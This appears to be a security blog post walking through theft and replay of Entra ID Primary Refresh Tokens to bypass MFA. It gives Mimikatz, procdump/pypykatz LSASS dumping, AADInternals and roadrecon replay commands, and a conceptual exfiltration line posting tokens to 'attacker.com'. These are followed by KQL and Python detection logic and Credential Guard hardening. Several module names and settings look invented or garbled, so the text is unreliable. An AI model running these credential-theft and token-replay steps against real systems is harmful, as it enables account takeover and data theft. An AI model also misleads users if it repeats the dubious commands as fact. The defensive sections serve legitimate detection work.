PRTxtractor Unleashed: How Attackers Bypass MFA by Stealing Entra ID Primary Refresh Tokens + Video


Introduction:

Primary Refresh Tokens (PRTs) are the cryptographic keys to the kingdom in modern Entra ID (formerly Azure AD) environments, enabling seamless single sign-on and session persistence. However, when an attacker extracts a PRT from a compromised Windows endpoint, they can forge device identities, bypass Multi-Factor Authentication (MFA) entirely, and access cloud resources as if they were the legitimate user—no password or second factor required. This article dissects the PRT extraction attack chain, provides hands-on steps for red-team simulation, and offers defensive measures to lock down Entra ID token hygiene.

Learning Objectives:

  • Understand the architecture and role of Primary Refresh Tokens in Entra ID authentication.
  • Learn step-by-step extraction of PRTs using tools like Mimikatz and PRTxtractor on Windows and Linux.
  • Implement detection rules, Conditional Access policies, and token protection to mitigate PRT theft.

You Should Know:

  1. What Is a Primary Refresh Token (PRT) and Why Attackers Covet It

A PRT is a JSON Web Token (JWT) issued by Entra ID to a Windows 10/11 or later device that is Hybrid or Azure AD-joined. It acts as the master session key: the device uses the PRT to request access tokens for any application without re‑entering credentials or MFA. Because the PRT is bound to the device’s hardware (via the Trusted Platform Module – TPM), extraction was once difficult, but attackers now bypass TPM protections by abusing the Windows Data Protection API (DPAPI) and retrieving the PRT from LSASS memory or the user’s local state.

Once stolen, an attacker can replay the PRT on their own machine, impersonate the device, and request tokens for Microsoft 365, SharePoint, VPN, or custom apps – completely sidestepping MFA.

  2. PRT Extraction on Windows Using Mimikatz (Step‑by‑Step)

This method targets the DPAPI blob containing the PRT, which is stored under the user’s profile. You need local administrator privileges on the compromised Windows host.

Step 1 – Elevate to SYSTEM

Open an elevated Command Prompt or PowerShell, then run Mimikatz:

mimikatz.exe "privilege::debug" "token::elevate" "exit"

Step 2 – Extract the PRT DPAPI Blob

Use the `dpapi::prt` module (available in recent Mimikatz versions):

mimikatz.exe "privilege::debug" "dpapi::prt /user:[email protected] /password:PlaintextPass? /method:logon" "exit"

Alternatively, if you have a hash or a TOTP, adjust accordingly. The output will show a base64‑encoded PRT value.

Step 3 – Convert PRT to a Usable Token

Use the `AADInternals` PowerShell module to transform the extracted blob into a raw PRT JWT:

Install-Module AADInternals -Force
Import-Module AADInternals
$prtBlob = "<base64 from Mimikatz>"
$prtJwt = ConvertTo-AADIntPRT -PRTBlob $prtBlob
$prtJwt | Out-File -FilePath C:\temp\prt.txt

Step 4 – Exfiltrate

Copy the `prt.txt` file to your attacker controller (e.g., via HTTP upload, SMB, or C2 channel).

  3. PRT Extraction Using PRTxtractor – Dedicated Tool Approach

The tool mentioned in the original post, “PRTxtractor,” is a focused utility that automates the extraction and exfiltration of PRTs. While not publicly released, you can replicate its functionality with a Python script that calls Mimikatz in memory and sends the token to a remote listener.

Simulated PRTxtractor Workflow

Assume the tool is deployed as a Windows executable or PowerShell one‑liner:

# Fake PRTxtractor command (conceptual)
PRTxtractor.exe /target:[email protected] /server:https://attacker.com/exfil

Under the hood, it performs:

– `procdump -ma lsass.exe lsass.dmp`
– Extracts PRT from the dump using `pypykatz`
– Base64 encodes and POSTs to attacker server

Linux‑Based Extraction (from a Windows memory dump)

If you obtain an LSASS dump from the target, use `pypykatz` on Kali:

pypykatz lsa minidump lsass.dmp
# Look for "prt" or "PrimaryRefreshToken" entries
# Save the token to a file
echo -n "token_value" > prt.jwt

Then replay it with `roadrecon` (see next section).

  4. Using an Extracted PRT to Bypass MFA on Linux / Windows

Once you have the raw PRT JWT, you can impersonate the device and obtain access tokens for any Entra ID application without ever providing a password or MFA.

On Linux (using roadrecon – an Azure AD reconnaissance tool)

# Install roadrecon
pip3 install roadrecon
# Authenticate using the stolen PRT
roadrecon auth prt --prt-token "$(cat prt.jwt)" --username [email protected]
# Request an access token for Microsoft Graph
roadrecon token get --resource https://graph.microsoft.com
# Use the token with curl
curl -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/me

On Windows (using AADInternals)

Import-Module AADInternals
$prt = Get-Content C:\temp\prt.txt
$accessToken = Get-AADIntAccessTokenForPRT -PRTToken $prt -Resource "https://graph.microsoft.com"
Invoke-WebRequest -Uri "https://graph.microsoft.com/v1.0/me/messages" -Headers @{Authorization="Bearer $accessToken"}

Result – The attacker successfully reads the victim’s email, OneDrive files, Teams chats, and more, with MFA completely bypassed.

  5. Detection: Logs, Queries, and Anomalies

Defenders must hunt for PRT replay indicators. The most reliable source is Entra ID sign‑in logs.

KQL Query for Microsoft Sentinel / Log Analytics

AADNonInteractiveUserSignInLogs // PRT replay is non‑interactive; those sign‑ins land in this table, not in SigninLogs
| where ResultType == "0" // successful token requests only
| where ResourceIdentity == "Primary Refresh Token"
| extend DeviceId = tostring(todynamic(DeviceDetail).deviceId) // DeviceDetail is the device column (stored as JSON text in this table)
| summarize Count = count(), FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by UserPrincipalName, DeviceId, IPAddress, UserAgent
| where Count > 2 // Multiple token requests from same device in short time
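As an added, defender‑side example that is not part of the original post: the same hunt as the KQL above, run in Python over constructed non‑interactive sign‑in records, plus a second check the article’s threat model implies (one device identity authenticating from more than one IP inside a short window). Column names follow the Entra sign‑in log schema; the records, the thresholds and the window sizes are assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample records (not real telemetry); column names follow the
# Entra sign-in log schema. ResultType "0" marks a successful token request.
FIELDS = ("TimeGenerated", "UserPrincipalName", "DeviceId", "IPAddress", "ResultType")
RAW = [
    ("2024-05-01T09:00:00Z", "victim@example.com", "dev-1111", "10.0.0.5", "0"),
    ("2024-05-01T09:30:00Z", "victim@example.com", "dev-1111", "10.0.0.5", "0"),
    ("2024-05-01T09:40:00Z", "victim@example.com", "dev-1111", "203.0.113.9", "0"),  # same device, 2nd IP
    ("2024-05-01T09:41:00Z", "victim@example.com", "dev-1111", "203.0.113.9", "0"),
    ("2024-05-01T09:42:00Z", "victim@example.com", "dev-1111", "203.0.113.9", "50173"),  # failure, ignored
    ("2024-05-01T09:43:00Z", "victim@example.com", "dev-1111", "203.0.113.9", "0"),
    ("2024-05-01T11:00:00Z", "other@example.com", "dev-2222", "10.0.0.7", "0"),
]
SAMPLE_LOGS = [dict(zip(FIELDS, row)) for row in RAW]

def _ts(rec):
    return datetime.fromisoformat(rec["TimeGenerated"].replace("Z", "+00:00"))

def successful(records):
    """Successful token requests only, oldest first (the KQL success filter)."""
    return sorted((r for r in records if r["ResultType"] == "0"), key=_ts)

def find_bursts(records, window_minutes=10, threshold=3):
    """(UPN, DeviceId, IP) groups with >= threshold successes inside a sliding window: the KQL 'Count > 2', time-bounded."""
    by_key = defaultdict(list)
    for r in successful(records):
        by_key[(r["UserPrincipalName"], r["DeviceId"], r["IPAddress"])].append(_ts(r))
    hits = []
    for key, times in by_key.items():
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_minutes * 60:
                hits.append(key)
                break
    return hits

def find_device_ip_drift(records, window_hours=1):
    """{DeviceId: sorted IPs} where one device identity was used from >1 IP within the window: a replay indicator, not proof."""
    by_device = defaultdict(list)
    for r in successful(records):
        by_device[r["DeviceId"]].append((_ts(r), r["IPAddress"]))
    drift = {}
    for dev, events in by_device.items():
        for i, (t0, _) in enumerate(events):
            ips = {ip for t, ip in events[i:] if (t - t0).total_seconds() <= window_hours * 3600}
            if len(ips) > 1:
                drift[dev] = sorted(ips)
                break
    return drift
```

Both functions return plain Python structures so the output can be fed into a ticketing or SOAR step; a device flagged by `find_device_ip_drift` is the case to correlate with the Sysmon LSASS‑access events listed below.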

Sysmon Event ID 10 (ProcessAccess) – Monitor LSASS access by unusual processes (e.g., procdump.exe, mimikatz.exe, python.exe).
Windows Event ID 4624 – Look for logon type 9 (NewCredentials) or type 4 (Batch) from non‑interactive PRT flows.

Network Detection – Outbound connections from workstations to rare IPs over HTTPS (exfiltration) or inbound connections from attacker‑controlled IPs for token replay.

  6. Mitigation and Hardening: Stop PRT Theft Before It Starts

Enable Token Protection (Preview) – Token Protection binds access tokens to the device’s TPM, making replayed tokens invalid. Go to Entra Admin Center > Protection > Authentication Methods > Token Protection.

Disable Legacy Protocol Fallback – PRT extraction often succeeds because DPAPI is weak when TPM is unavailable. Force TPM usage:

# On Windows, ensure TPM is initialized and PCR7 binding is active
Get-Tpm
# Enable "Require TPM for PRT" via Group Policy: Computer Config > Admin Templates > System > Trusted Platform Module Services

Conditional Access Policy – Block token replay by requiring “Compliant device” or “Hybrid joined device” with sign‑in frequency set to “Every time” for sensitive apps. This forces fresh authentication, making stolen PRTs short‑lived.

Restrict LSASS Access – Enable Windows Defender Credential Guard:

# Deploy via Group Policy or PowerShell (a reboot is required for the change to take effect)
$DeviceGuardPath = "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard"
$LsaPath = "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa"
Set-ItemProperty -Path $DeviceGuardPath -Name "EnableVirtualizationBasedSecurity" -Value 1 -Type DWord -Force
Set-ItemProperty -Path $DeviceGuardPath -Name "RequirePlatformSecurityFeatures" -Value 1 -Type DWord -Force
# LsaCfgFlags lives under the Lsa key, not DeviceGuard: 1 = Credential Guard on with UEFI lock, 2 = on without lock
Set-ItemProperty -Path $LsaPath -Name "LsaCfgFlags" -Value 1 -Type DWord -Force

User Awareness – PRT extraction requires admin rights on the endpoint. Prioritize removing local admin rights and using LAPS (Local Administrator Password Solution).

  7. Red Team Lab Setup: Simulate PRT Extraction End‑to‑End

Build a safe lab to test PRT attacks and defenses.

Components

  • Azure tenant (free trial) with a test user `[email protected]`
    – Windows 10/11 VM joined to Entra ID (Hybrid or Azure AD joined)
  • Attacker Kali Linux VM (or Windows attacker VM with Mimikatz and roadrecon)

Step‑by‑Step Simulation

  1. On the victim Windows VM, log in as `victim` and ensure PRT is issued (check `dsregcmd /status` – look for “AzureAdJoined: YES” and “PrimaryRefreshToken: Present”).
  2. On attacker VM, gain admin access to victim VM (e.g., via RDP or Cobalt Strike beacon).
  3. Run Mimikatz `dpapi::prt` as shown in section 2 to extract the PRT.
  4. On attacker VM, use `roadrecon auth prt` to replay the PRT.
  5. Request a Microsoft Graph access token and list victim’s emails.
  6. Defend by enabling Token Protection – repeat the attack and observe failure (HTTP 401 with “token protection required”).

Cleanup – Delete test tenant after exercise to avoid token reuse.

What Undercode Say:

  • PRT theft turns MFA into a speed bump, not a barrier – Once an endpoint is compromised with admin rights, all cloud resources become accessible regardless of MFA enrollment.
  • Detection is reactive but critical – Organizations must monitor non‑interactive logins and LSASS access patterns; however, proactive token protection is the only true fix.
  • Token Protection is underused – Microsoft’s Token Protection feature (available for Entra ID Premium P2) should be mandatory for any high‑privilege account or sensitive application, yet most enterprises ignore it.

Prediction:

As PRT extraction tools become commoditized (e.g., PRTxtractor), Microsoft and other IdPs will accelerate the adoption of device‑bound tokens with hardware attestation. Within two years, “replay‑proof” PRTs using TPM 2.0 and secure enclaves will become the default, and legacy MFA bypass techniques will fade. Simultaneously, attackers will shift to on‑path token substitution and consent phishing, starting an arms race over continuous access evaluation (CAE) and real‑time risk signals. Organizations that fail to enable Token Protection today will face breach headlines tomorrow.

Reported By: Elzerpineda Entraid – Hackers Feeds